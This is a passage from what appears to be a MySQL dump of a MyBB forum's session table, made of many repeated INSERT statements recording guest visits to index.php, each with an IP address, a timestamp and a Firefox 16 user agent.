6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b8cf9c191929dda16c241d4cbd7b44be', '0', '217.82.214.51', '1352772700', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a55f4f5b8e8d86ed6f5eb2bca3791d62', '0', '159.106.115.234', '1352772701', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6f0348f401cac684afd6016a3cb6dfc9', '0', '82.131.108.249', '1352772702', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bde55ddaf3df63e505e121820ee27ea9', '0', '200.12.117.22', '1352772703', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a981f014c1a039900ccf1f88c8b510ba', '0', '115.41.207.121', '1352772704', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c0b74a095270cd69cd35ecec00384c8d', '0', '175.92.151.255', '1352772705', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1aab52779e280781f89f8405aafbe39f', '0', '212.158.108.143', '1352772705', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5fa0e06f18929112c4cf07887d916947', '0', '232.159.8.192', '1352772707', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('41ef6d52d3e00e761a0e317515c2b140', '0', '184.218.215.173', '1352772708', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9f6b88e56f298bb8350042493eb9b82d', '0', '141.126.1.83', '1352772709', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('16bd672d29461a42742815ecbc2cac81', '0', '50.252.110.2', '1352772710', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b38ed7cab158947ab2f06243ab65dd14', '0', '6.5.98.113', '1352772710', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f9682e3f0a8460dd236baef29deb4e0b', '0', '81.183.218.167', '1352772711', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('debae6a4683b18da9f20644c7942025d', '0', '202.216.143.102', '1352772713', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('17dd097247cd983282f1a7bbb96368de', '0', '178.31.191.233', '1352772714', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ab8aecbeabd783148a8c83e0645d1327', '0', '146.42.153.13', '1352772714', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('84478e4bfc01898e42c2caa204065c55', '0', '182.135.176.177', '1352772716', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c34303f60052f2157c93d6dee0bf6ebc', '0', '40.185.204.111', '1352772716', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b32642afd97df17a218d7f895a016b3d', '0', '240.177.239.24', '1352772717', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('df61f441fc6fe03ac9998beaa4ff76f9', '0', '226.173.57.136', '1352772718', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bf87240298a72985416b7e3360072c02', '0', '130.217.5.40', '1352772718', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('94b28519044af0e234b97347d2eb03d5', '0', '195.215.221.233', '1352772719', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0f02607eb8b0034b758716591c907777', '0', '246.68.2.101', '1352772720', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('280589a41a022d8fc601520bda1a7117', '0', '180.212.192.160', '1352772721', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0b9320b31d0e1918cbbba7d093ca513a', '0', '33.2.22.214', '1352772722', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('10a1cdf1a72dcb2e1c42f1c873e691f3', '0', '25.151.196.132', '1352772722', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a23d43d184d688e13d12b9e476b4ff02', '0', '27.100.47.111', '1352772723', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ba75c278d5beb181498da4f4ad87153e', '0', '121.236.136.209', '1352772724', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f4efcde00ec08f2b262213cd053fe079', '0', '117.44.158.164', '1352772725', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('17f840dd603ed23490fd8fd92f02c27e', '0', '42.103.14.67', '1352772725', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a406b087476e9882f1c5633d656b3252', '0', '238.252.77.51', '1352772726', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b0344215bd6767f02a78440844f32bc9', '0', '21.83.93.18', '1352772727', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cffd2e976b898b8aa29b7dd670669438', '0', '62.110.195.31', '1352772727', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f2dde9256ae60298e1837380b3b8cfd7', '0', '209.131.206.64', '1352772728', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('648393c3ce94c8bb54e3b048e6543f2b', '0', '218.248.66.202', '1352772729', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('335f3a6e9bdd5aca0a840923b84ae2a1', '0', '63.111.81.224', '1352772730', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6f7005419a4521f28ef1934d9bd17538', '0', '175.140.160.99', '1352772731', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7c3531e2ad65c1670b191753c4f16727', '0', '37.178.148.66', '1352772731', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f5e17417133dc76e61839afa6f1a1276', '0', '74.181.145.17', '1352772732', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('536589eb08d782a479ae1edf2be77672', '0', '161.106.250.74', '1352772733', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0ba492b4e8b721d2b94379f0217ceaec', '0', '164.156.249.192', '1352772734', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6af78cd0cf8bf47597bf0b91055a5262', '0', '179.208.48.129', '1352772734', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('85c96e87dbf5313391158ece65de06f2', '0', '55.23.12.137', '1352772735', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b098c22fe73956946d2b15f96bb0093c', '0', '18.167.183.220', '1352772736', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('420f7d49df6e4a296967e3251053db07', '0', '143.143.162.35', '1352772736', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4b70823ddfbb793e5289520a8b485b0d', '0', '110.230.29.177', '1352772737', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4b54c55defd5699dbf49c964a101cbf8', '0', '115.31.70.66', '1352772737', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ae7fd3226ef61cd46450a975df474af3', '0', '135.224.48.53', '1352772738', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c1973e0845427c3f3ca2afbd0a79822e', '0', '29.102.244.254', '1352772739', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2b0401a6cf618d293184e26db66926b8', '0', '169.74.245.202', '1352772740', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('510bf60c0e7c438afcc7c5043d6ca5a7', '0', '164.178.27.229', '1352772740', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('400315dbd2ff0f5bd653f5129d01d72d', '0', '185.102.127.244', '1352772741', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ab6ad7727eff88b970cda4ced012a35c', '0', '84.249.70.239', '1352772742', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2d0d44eb2af7eca41e3c4061a83124ae', '0', '205.55.107.39', '1352772742', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('db38b37a38d8ae13ccd356677f6fd442', '0', '60.141.158.56', '1352772743', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3e9ac51bddab75684c6e9c0160f7417d', '0', '92.69.236.24', '1352772744', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0eca39683b92adadfb24c40d23e12ccb', '0', '248.28.29.87', '1352772745', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('102b6b891199659eb72e1b19f7637be9', '0', '154.107.136.27', '1352772745', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f26d1b22fbd0028058f3acc9a3a2c3e7', '0', '72.220.14.78', '1352772746', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('176a45ca138403d2bbc95e70d63b55e3', '0', '166.108.101.80', '1352772747', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cefbf0664051fdc3e93b115a6cbbf79f', '0', '184.242.174.188', '1352772747', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a2e47546d113d7c046c567e3eab06e8a', '0', '218.194.107.248', '1352772748', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6a910068b638e9d364b8861c459aa2fa', '0', '90.45.66.163', '1352772749', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('74b7dd327d563e3bdd5388a49f725937', '0', '216.49.147.111', '1352772749', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d3a963687305a9a9e987951c2eb00d22', '0', '14.22.76.18', '1352772750', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('edcb04efee40ecbda7c661b239bb8103', '0', '204.159.27.43', '1352772751', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('96d6e28b5400a9ad77caeeb1179a53f2', '0', '100.65.220.31', '1352772753', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7c14b2ebc8665d4a5000c245feb59741', '0', '0.227.53.238', '1352772754', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('60525d139997f39ef578330b86f045f9', '0', '235.247.143.57', '1352772755', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('75a8a50c21219f67576b13e67c67ea5b', '0', '208.117.33.161', '1352772755', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e61f601528d4b5d0dcdd3ad96046fd06', '0', '14.83.46.195', '1352772756', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e589e1b7d52fc527638afe3cd9158e23', '0', '152.193.59.106', '1352772757', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1ec395e9085f1fc74264d0498b2a8088', '0', '123.70.219.104', '1352772758', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('768dcb8191465d76dd587d4d907f6c39', '0', '176.82.98.121', '1352772758', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('96a1356663f312b3e5dbc4e184e00abf', '0', '33.49.205.71', '1352772759', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5491d5550b9d3d475ddf312dc2807785', '0', '119.31.85.129', '1352772760', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ce8d2391316d12c91dcc1adaf1d9ff1e', '0', '150.48.201.120', '1352772761', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4682589e5fb1973e8afd7cb6747086ba', '0', '144.235.131.69', '1352772761', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0db725609df75e09f6e6aac10f6cc610', '0', '215.104.217.168', '1352772762', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, 